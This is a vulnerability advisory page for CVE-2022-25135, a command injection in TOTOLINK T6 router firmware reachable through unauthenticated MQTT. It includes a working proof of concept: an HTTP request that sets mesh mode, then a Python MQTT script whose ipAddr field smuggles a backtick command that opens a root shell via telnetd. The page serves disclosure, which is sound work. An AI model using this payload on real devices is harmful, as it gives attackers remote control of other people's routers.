Headline

CVE-2022-25135: my_vuln/19.md at main · pjqwudi1/my_vuln

A command injection vulnerability in the function recv_mesh_info_sync of TOTOLINK Technology router T6 V3_Firmware T6_V3_V4.1.5cu.748_B20211015 allows attackers to execute arbitrary commands via a crafted MQTT packet.

2 years ago

CVE

Open in Source

#vulnerability #ubuntu #linux #js #git #java

TOTOLINK Vulnerability

Vendor:TOTOLINK

Product:T6

Version:T6 V3_Firmware(T6_V3_V4.1.5cu.748_B20211015)(Download Link:https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/190/ids/36.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in TOTOLINK Technology router with firmware which was released recently，allows remote attackers to execute arbitrary OS commands from a crafted request.(MQTT, no authentication required)

Remote Command Execution

In wireless.so binary:

In recv_mesh_info_sync function,ipAddr is directly passed by the attacker, so we can control the ipAddr to attack the OS.

It should be noted that here you need to ensure that the value of apmib_get(18091, &v11) is not 1.

Where does the value of apmib_get(18091, &v11) come from?

In setWiFiMeshConfig function

Supplement

The trigger point of this vulnerability is deep in the program path, so we recommend that the string content should be strictly checked when extracting user input.

Vulnerability trigger steps:

set masterMode =2, in (setWiFiMeshConfig)
set ipAddr, in (recv_mesh_info_sync)

PoC

We set masterMode as 2 , and the router will excute it,such as:

POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.1.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 66 Origin: http://192.168.1.1 Connection: close Referer: http://192.168.1.1/basic/mesh.html Cookie: SESSION_ID=2:1644745071:2

{"effectType":"2","masterMode":"2","topicurl":"setWiFiMeshConfig"}

We set ipAddr as telnetd -l /bin/sh -p 10004 , and the router will excute it,such as:

import paho.mqtt.client as mqtt client = mqtt.Client() client.connect("192.168.1.1",1883,60) client.publish(‘totolink/router/recv_mesh_info_sync’,payload=’{"ipAddr":"`telnetd -l /bin/sh -p 10004`","md5Val":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","staticInfoFlag":"0"}’)

Result

Get a shell!